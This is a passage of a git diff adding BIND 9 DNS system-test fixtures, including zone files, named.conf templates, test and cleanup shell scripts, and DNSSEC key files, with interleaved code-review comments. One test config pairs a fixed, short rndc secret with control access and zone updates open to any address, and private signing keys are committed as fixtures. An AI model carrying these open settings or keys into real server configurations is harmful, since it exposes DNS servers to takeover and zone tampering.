+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ CH SOA ns root (
+ 2018010100 ; serial
+ 1800 ; refresh (30 minutes)
+ 1800 ; retry (30 minutes)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A ch-addr.example. 1001
+test A ch-addr.example. 1002
+ A ch-addr.example. 1003
diff --git a/bin/tests/system/auth/ns1/example.com.db b/bin/tests/system/auth/ns1/example.com.db
new file mode 100644
index 0000000..6768895
--- /dev/null
+++ b/bin/tests/system/auth/ns1/example.com.db
@@ -0,0 +1,25 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA ns root (
+ 2018010100 ; serial
+ 1800 ; refresh (30 minutes)
+ 1800 ; retry (30 minutes)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.1
+www CNAME server.example.net.
+inzone CNAME a.example.com.
+a A 10.53.0.1
+dname DNAME @
diff --git a/bin/tests/system/auth/ns1/example.net.db b/bin/tests/system/auth/ns1/example.net.db
new file mode 100644
index 0000000..29885ca
--- /dev/null
+++ b/bin/tests/system/auth/ns1/example.net.db
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA ns root (
+ 2018010100 ; serial
+ 1800 ; refresh (30 minutes)
+ 1800 ; retry (30 minutes)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.1
+server A 10.53.0.100
diff --git a/bin/tests/system/auth/ns1/named.conf.in b/bin/tests/system/auth/ns1/named.conf.in
new file mode 100644
index 0000000..db7570e
--- /dev/null
+++ b/bin/tests/system/auth/ns1/named.conf.in
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+};
+
+view main in {
+ zone example.net {
+ type primary;
+ file "example.net.db";
+ };
+
+ zone example.com {
+ type primary;
+ file "example.com.db";
+ };
+};
+
+view alt chaos {
+ zone example.chaos chaos {
+ type primary;
+ file "chaos.db";
+ };
+};
diff --git a/bin/tests/system/auth/ns2/named.conf.in b/bin/tests/system/auth/ns2/named.conf.in
new file mode 100644
index 0000000..126d576
--- /dev/null
+++ b/bin/tests/system/auth/ns2/named.conf.in
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify no;
+};
+
+zone example.net {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "example.net.bk";
+};
+
+zone example.com {
+ type secondary;
+ primaries { 10.53.0.1; };
+ file "example.com.bk";
+};
diff --git a/bin/tests/system/auth/setup.sh b/bin/tests/system/auth/setup.sh
new file mode 100644
index 0000000..36969b7
--- /dev/null
+++ b/bin/tests/system/auth/setup.sh
@@ -0,0 +1,18 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
diff --git a/bin/tests/system/auth/tests.sh b/bin/tests/system/auth/tests.sh
new file mode 100644
index 0000000..d7e923e
--- /dev/null
+++ b/bin/tests/system/auth/tests.sh
@@ -0,0 +1,191 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp -p ${PORT}" + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "wait for zones to finish transferring to ns2 ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + for zone in example.com example.net + do + $DIG $DIGOPTS @10.53.0.2 soa $zone > dig.out.test$n || ret=1 + grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 + done + [ $ret -eq 0 ] && break + sleep 1 +done +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +# +# If recursion is unrequested or unavailable, then cross-zone CNAME records +# should not be followed. If both requested and available, they should be. 
+# +n=`expr $n + 1` +echo_i "check that cross-zone CNAME record does not return target data (rd=0/ra=0) ($n)" +ret=0 +$DIG $DIGOPTS +norec @10.53.0.1 www.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa;" dig.out.test$n > /dev/null || ret=1 +grep "www.example.com.*CNAME.*server.example.net" dig.out.test$n > /dev/null || ret=1 +grep "server.example.net.*A.*10.53.0.100" dig.out.test$n > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that cross-zone CNAME record does not return target data (rd=1/ra=0) ($n)" +ret=0 +$DIG $DIGOPTS +rec @10.53.0.1 www.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa rd;" dig.out.test$n > /dev/null || ret=1 +grep "www.example.com.*CNAME.*server.example.net" dig.out.test$n > /dev/null || ret=1 +grep "server.example.net.*A.*10.53.0.100" dig.out.test$n > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that cross-zone CNAME record does not return target data (rd=0/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS +norec @10.53.0.2 www.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa ra;" dig.out.test$n > /dev/null || ret=1 +grep "www.example.com.*CNAME.*server.example.net" dig.out.test$n > /dev/null || ret=1 +grep "server.example.net.*A.*10.53.0.100" dig.out.test$n > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that cross-zone CNAME records return target data (rd=1/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 www.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa rd ra;" dig.out.test$n > /dev/null || ret=1 +grep "www.example.com.*CNAME.*server.example.net" dig.out.test$n > /dev/null || ret=1 +grep 
"server.example.net.*A.*10.53.0.100" dig.out.test$n > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +# +# In-zone CNAME records should always be followed regardless of RD and RA. +# +n=`expr $n + 1` +echo_i "check that in-zone CNAME records return target data (rd=0/ra=0) ($n)" +ret=0 +$DIG $DIGOPTS +norec @10.53.0.1 inzone.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa;" dig.out.test$n > /dev/null || ret=1 +grep "inzone.example.com.*CNAME.*a.example.com" dig.out.test$n > /dev/null || ret=1 +grep "a.example.com.*A.*10.53.0.1" dig.out.test$n > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that in-zone CNAME records returns target data (rd=1/ra=0) ($n)" +ret=0 +$DIG $DIGOPTS +rec @10.53.0.1 inzone.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa rd;" dig.out.test$n > /dev/null || ret=1 +grep "inzone.example.com.*CNAME.*a.example.com" dig.out.test$n > /dev/null || ret=1 +grep "a.example.com.*A.*10.53.0.1" dig.out.test$n > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that in-zone CNAME records return target data (rd=0/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS +norec @10.53.0.2 inzone.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "flags: qr aa ra;" dig.out.test$n > /dev/null || ret=1 +grep "inzone.example.com.*CNAME.*a.example.com" dig.out.test$n > /dev/null || ret=1 +grep "a.example.com.*A.*10.53.0.1" dig.out.test$n > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that in-zone CNAME records return target data (rd=1/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 inzone.example.com > dig.out.test$n || ret=1 +grep "ANSWER: 2," dig.out.test$n > 
/dev/null || ret=1 +grep "flags: qr aa rd ra;" dig.out.test$n > /dev/null || ret=1 +grep "inzone.example.com.*CNAME.*a.example.com" dig.out.test$n > /dev/null || ret=1 +grep "a.example.com.*A.*10.53.0.1" dig.out.test$n > /dev/null || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that in-zone CNAME records does not return target data when QTYPE is CNAME (rd=1/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -t cname inzone.example.com > dig.out.test$n || ret=1 +grep 'ANSWER: 1,' dig.out.test$n > /dev/null || ret=1 +grep 'flags: qr aa rd ra;' dig.out.test$n > /dev/null || ret=1 +grep 'inzone\.example\.com\..*CNAME.a\.example\.com\.' dig.out.test$n > /dev/null || ret=1 +grep 'a\.example\.com\..*A.10\.53\.0\.1' dig.out.test$n > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that in-zone CNAME records does not return target data when QTYPE is ANY (rd=1/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -t any inzone.example.com > dig.out.test$n || ret=1 +grep 'ANSWER: 1,' dig.out.test$n > /dev/null || ret=1 +grep 'flags: qr aa rd ra;' dig.out.test$n > /dev/null || ret=1 +grep 'inzone\.example\.com\..*CNAME.a\.example\.com\.' dig.out.test$n > /dev/null || ret=1 +grep 'a\.example\.com\..*A.10\.53\.0\.1' dig.out.test$n > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that in-zone DNAME records does not return target data when QTYPE is CNAME (rd=1/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -t cname inzone.dname.example.com > dig.out.test$n || ret=1 +grep 'ANSWER: 2,' dig.out.test$n > /dev/null || ret=1 +grep 'flags: qr aa rd ra;' dig.out.test$n > /dev/null || ret=1 +grep 'dname\.example\.com\..*DNAME.example\.com\.' dig.out.test$n > /dev/null || ret=1 +grep 'inzone\.dname\.example\.com\..*CNAME.inzone\.example\.com\.' 
dig.out.test$n > /dev/null || ret=1 +grep 'inzone\.example\.com\..*CNAME.a\.example\.com\.' dig.out.test$n > /dev/null && ret=1 +grep 'a\.example\.com\..*A.10\.53\.0\.1' dig.out.test$n > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that in-zone DNAME records does not return target data when QTYPE is ANY (rd=1/ra=1) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -t any inzone.dname.example.com > dig.out.test$n || ret=1 +grep 'ANSWER: 2,' dig.out.test$n > /dev/null || ret=1 +grep 'flags: qr aa rd ra;' dig.out.test$n > /dev/null || ret=1 +grep 'dname\.example\.com\..*DNAME.example\.com\.' dig.out.test$n > /dev/null || ret=1 +grep 'inzone\.dname\.example\.com\..*CNAME.inzone\.example\.com\.' dig.out.test$n > /dev/null || ret=1 +grep 'inzone\.example\.com.*CNAME.a\.example\.com\.' dig.out.test$n > /dev/null && ret=1 +grep 'a\.example\.com.*A.10\.53\.0\.1' dig.out.test$n > /dev/null && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that CHAOS addresses are compared correctly ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 +noall +answer ch test.example.chaos > dig.out.test$n +lines=`wc -l < dig.out.test$n` +[ ${lines:-0} -eq 2 ] || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/autosign/clean.sh b/bin/tests/system/autosign/clean.sh new file mode 100644 index 0000000..ef67677 --- /dev/null +++ b/bin/tests/system/autosign/clean.sh 
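Review bot: In auth/tests.sh the final check, "CHAOS addresses are compared correctly", is the only query in the script whose `$DIG` exit status is discarded, so a failed or timed-out query is judged solely by the line count of whatever reached `dig.out.test$n`. Append `|| ret=1` to that line as every other test does: `$DIG $DIGOPTS @10.53.0.1 +noall +answer ch test.example.chaos > dig.out.test$n || ret=1`. The count of 2 also does not show which records came back; grepping for the `1002` and `1003` addresses that chaos.db defines for `test` would make the assertion state what it is checking.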
@@ -0,0 +1,75 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */K* */dsset-* */*.signed */tmp* */*.jnl */*.bk +rm -f */core +rm -f */example.bk +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run* +rm -f */trusted.conf */private.conf +rm -f activate-now-publish-1day.key +rm -f active.key inact.key del.key delzsk.key unpub.key standby.key rev.key +rm -f delayksk.key delayzsk.key autoksk.key autozsk.key +rm -f dig.out.* +rm -f digcomp.out.test* +rm -f noksk-ksk.key nozsk-ksk.key nozsk-zsk.key inaczsk-zsk.key inaczsk-ksk.key +rm -f nopriv.key vanishing.key del1.key del2.key +rm -f ns*/managed-keys.bind* +rm -f ns*/named.lock +rm -f ns1/root.db +rm -f ns2/example.db +rm -f ns2/optout-with-ent.db +rm -f ns2/private.secure.example.db ns2/bar.db +rm -f ns3/*.nzd ns3/*.nzd-lock ns3/*.nzf +rm -f ns3/*.nzf +rm -f ns3/autonsec3.example.db +rm -f ns3/cdnskey-delete.example.db +rm -f ns3/cds-delete.example.db +rm -f ns3/delzsk.example.db +rm -f ns3/dname-at-apex-nsec3.example.db +rm -f ns3/inacksk2.example.db +rm -f ns3/inacksk3.example.db +rm -f ns3/inaczsk2.example.db +rm -f ns3/inaczsk3.example.db +rm -f ns3/jitter.nsec3.example.db +rm -f ns3/kg.out ns3/s.out ns3/st.out +rm -f ns3/kskonly.example.db +rm -f ns3/named.ns3.prev +rm -f ns3/noksk.example.db +rm -f ns3/nozsk.example.db ns3/inaczsk.example.db +rm -f ns3/nsec-only.example.db +rm -f ns3/nsec3-to-nsec.example.db +rm -f ns3/nsec3.example.db +rm -f ns3/nsec3.nsec3.example.db +rm -f ns3/nsec3.optout.example.db +rm -f ns3/oldsigs.example.db +rm -f ns3/optout.example.db +rm -f ns3/optout.nsec3.example.db +rm -f 
ns3/optout.optout.example.db +rm -f ns3/prepub.example.db +rm -f ns3/prepub.example.db.in +rm -f ns3/reconf.example.db +rm -f ns3/rsasha256.example.db ns3/rsasha512.example.db +rm -f ns3/secure-to-insecure.example.db +rm -f ns3/secure-to-insecure2.example.db +rm -f ns3/secure.example.db +rm -f ns3/secure.nsec3.example.db +rm -f ns3/secure.optout.example.db +rm -f ns3/settime.out.* +rm -f ns3/sync.example.db +rm -f ns3/ttl*.db +rm -f nsupdate.out +rm -f settime.out.* +rm -f signing.out.* +rm -f sync.key diff --git a/bin/tests/system/autosign/ns1/keygen.sh b/bin/tests/system/autosign/ns1/keygen.sh new file mode 100644 index 0000000..44401cb --- /dev/null +++ b/bin/tests/system/autosign/ns1/keygen.sh 
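Review bot: In autosign/clean.sh, `rm -f ns3/*.nzf` is listed twice in a row, first as the last argument of `rm -f ns3/*.nzd ns3/*.nzd-lock ns3/*.nzf` and then again on the following line; the second line can be dropped. The list is otherwise alphabetical by path, so keeping one entry per pattern makes it easier to see whether a newly generated file is covered.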
@@ -0,0 +1,54 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=. +zonefile=root.db +infile=root.db.in + +(cd ../ns2 && $SHELL keygen.sh ) + +cat $infile ../ns2/dsset-example$TP ../ns2/dsset-bar$TP > $zonefile + +zskact=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q $zone) +zskvanish=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q $zone) +zskdel=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q -D now $zone) +zskinact=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q -I now $zone) +zskunpub=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q -G $zone) +zsksby=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q -A none $zone) +zskactnowpub1d=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q -A now -P +1d $zone) +zsknopriv=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q $zone) +rm $zsknopriv.private + +ksksby=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q -P now -A now+15s -fk $zone) +kskrev=$($KEYGEN -3 -a ${DEFAULT_ALGORITHM} -q -R now+15s -fk $zone) + +keyfile_to_static_ds $ksksby > trusted.conf +cp trusted.conf ../ns2/trusted.conf +cp trusted.conf ../ns3/trusted.conf +cp trusted.conf ../ns4/trusted.conf + +keyfile_to_static_ds $kskrev > trusted.conf +cp trusted.conf ../ns5/trusted.conf + +echo $zskact > ../active.key +echo $zskvanish > ../vanishing.key +echo $zskdel > ../del.key +echo $zskinact > ../inact.key +echo $zskunpub > ../unpub.key +echo $zsknopriv > ../nopriv.key +echo $zsksby > ../standby.key +echo $zskactnowpub1d > ../activate-now-publish-1day.key +$REVOKE -R $kskrev > ../rev.key 
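Review bot: The `-e` in `#!/bin/sh -e` of autosign/ns1/keygen.sh takes effect only when the script is executed through its shebang; `(cd ../ns2 && $SHELL keygen.sh )` names the interpreter explicitly, so ns2/keygen.sh, which carries the same shebang, runs without errexit, and this script does too if its caller starts it the same way (the caller is not in this hunk). A failing `$KEYGEN` would then leave empty content in `trusted.conf` and the `../*.key` marker files instead of stopping the setup. Put `set -e` as the first command after the licence header in both scripts. Where `trusted.conf` is written a second time, a comment such as `# ns1 and ns5 keep the soon-to-be-revoked KSK as their trust anchor` would record what looks like a deliberate choice; confirm the intent before adding it.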
diff --git a/bin/tests/system/autosign/ns1/named.conf.in b/bin/tests/system/autosign/ns1/named.conf.in
new file mode 100644
index 0000000..d0cfa03
--- /dev/null
+++ b/bin/tests/system/autosign/ns1/named.conf.in
@@ -0,0 +1,47 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS1
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+ allow-transfer { any; };
+ allow-query { any; };
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/autosign/ns1/root.db.in b/bin/tests/system/autosign/ns1/root.db.in
new file mode 100644
index 0000000..6715a02
--- /dev/null
+++ b/bin/tests/system/autosign/ns1/root.db.in
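Review bot: In autosign/ns1/named.conf.in the `controls` statement accepts rndc from `any` address with the fixed secret `"1234abcd8765"`, which decodes to only nine bytes, and the root zone sets `allow-update { any; }` and `allow-transfer { any; }`; nothing in the file says this is acceptable only because the server listens solely on the 10.53.0.1 test address. Add a line under `// NS1`, for example `// Test fixture: fixed rndc key and open ACLs; only for the 10.53.0.x test network.` If the harness always runs rndc from a 10.53.0.x source address (not visible here), `allow { 10.53.0.0/24; }` in the `inet` clause would state that assumption in the config itself. autosign/ns2/named.conf.in repeats the same key and ACLs.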
@@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 30 +. IN SOA a.root.servers.nil. each.isc.org. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +. TXT "root zone" +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +bar. NS ns2.example. +ns2.example. A 10.53.0.2 diff --git a/bin/tests/system/autosign/ns2/Xbar.+013+59973.key b/bin/tests/system/autosign/ns2/Xbar.+013+59973.key new file mode 100644 index 0000000..1f4d1f4 --- /dev/null +++ b/bin/tests/system/autosign/ns2/Xbar.+013+59973.key @@ -0,0 +1,5 @@ +; This is a key-signing key, keyid 59973, for bar. +; Created: 20220623022335 (Thu Jun 23 12:23:35 2022) +; Publish: 20220623022335 (Thu Jun 23 12:23:35 2022) +; Activate: 20220623022335 (Thu Jun 23 12:23:35 2022) +bar. IN DNSKEY 257 3 13 QT6CpMaV4BT072+NaKLY5H01Mj2r1MOgsxgoiTAq1Fbf6rrkEWpnbktu Dh9Ol9kuzcUrefxDuxNwsXJu3iDPxw== diff --git a/bin/tests/system/autosign/ns2/Xbar.+013+59973.private b/bin/tests/system/autosign/ns2/Xbar.+013+59973.private new file mode 100644 index 0000000..708d242 --- /dev/null +++ b/bin/tests/system/autosign/ns2/Xbar.+013+59973.private @@ -0,0 +1,6 @@ +Private-key-format: v1.3 +Algorithm: 13 (ECDSAP256SHA256) +PrivateKey: joFZ8vCdyqkgMb6rZ0zanrdrzOSCg1GyEJV6tp5F+Bw= +Created: 20220623022335 +Publish: 20220623022335 +Activate: 20220623022335 diff --git a/bin/tests/system/autosign/ns2/Xbar.+013+60101.key b/bin/tests/system/autosign/ns2/Xbar.+013+60101.key new file mode 100644 index 0000000..0c47840 --- /dev/null +++ b/bin/tests/system/autosign/ns2/Xbar.+013+60101.key 
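Review bot: In autosign/ns1/root.db.in the SOA MNAME is written `a.root.servers.nil.` while the NS record and its glue use `a.root-servers.nil.`, so the primary named in the SOA has no address record in this zone. If no test depends on the difference, make the SOA line read `. IN SOA a.root-servers.nil. each.isc.org. (`. If the mismatch is intentional, a `;` comment on that line saying so would keep it from being corrected by accident later.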
@@ -0,0 +1,5 @@ +; This is a key-signing key, keyid 60101, for bar. +; Created: 20220623022331 (Thu Jun 23 12:23:31 2022) +; Publish: 20220623022331 (Thu Jun 23 12:23:31 2022) +; Activate: 20220623022331 (Thu Jun 23 12:23:31 2022) +bar. IN DNSKEY 257 3 13 dLGGOAE5uJd53Gci9MdymaRTMwsXVn13j05IfGJoVt9ucpeXpoIKVViX JNVE/uO4eJvkHycdEAvdVUWcslEmMQ== diff --git a/bin/tests/system/autosign/ns2/Xbar.+013+60101.private b/bin/tests/system/autosign/ns2/Xbar.+013+60101.private new file mode 100644 index 0000000..6ca8370 --- /dev/null +++ b/bin/tests/system/autosign/ns2/Xbar.+013+60101.private @@ -0,0 +1,6 @@ +Private-key-format: v1.3 +Algorithm: 13 (ECDSAP256SHA256) +PrivateKey: pTTXxZUTzeVBXHMUJxTMxjh9yU4oxDtEhEvpkj+olf0= +Created: 20220623022331 +Publish: 20220623022331 +Activate: 20220623022331 diff --git a/bin/tests/system/autosign/ns2/bar.db.in b/bin/tests/system/autosign/ns2/bar.db.in new file mode 100644 index 0000000..8a9fa98 --- /dev/null +++ b/bin/tests/system/autosign/ns2/bar.db.in 
@@ -0,0 +1,80 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 + +; Used for testing ANY queries +foo TXT "testing" +foo A 10.0.1.0 + +; Used for testing CNAME queries +cname1 CNAME cname1-target +cname1-target TXT "testing cname" + +cname2 CNAME cname2-target +cname2-target TXT "testing cname" + +; Used for testing DNAME queries +dname1 DNAME dname1-target +foo.dname1-target TXT "testing dname" + +dname2 DNAME dname2-target +foo.dname2-target TXT "testing dname" + +; A secure subdomain +secure NS ns.secure +ns.secure A 10.53.0.3 + +; An insecure subdomain +insecure NS ns.insecure +ns.insecure A 10.53.0.3 + +; A insecure subdomain +mustbesecure NS ns.mustbesecure +ns.mustbesecure A 10.53.0.3 + +z A 10.0.0.26 + +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 + +optout NS ns.optout +ns.optout A 10.53.0.3 + +nsec3-unknown NS ns.nsec3-unknown +ns.nsec3-unknown A 10.53.0.3 + +optout-unknown NS ns.optout-unknown +ns.optout-unknown A 10.53.0.3 + +multiple NS ns.multiple +ns.multiple A 10.53.0.3 + +rsasha256 NS ns.rsasha256 +ns.rsasha256 A 10.53.0.3 + +rsasha512 NS ns.rsasha512 +ns.rsasha512 A 10.53.0.3 diff --git a/bin/tests/system/autosign/ns2/child.nsec3.example.db b/bin/tests/system/autosign/ns2/child.nsec3.example.db new file mode 100644 index 0000000..8fc3bc8 --- /dev/null +++ b/bin/tests/system/autosign/ns2/child.nsec3.example.db 
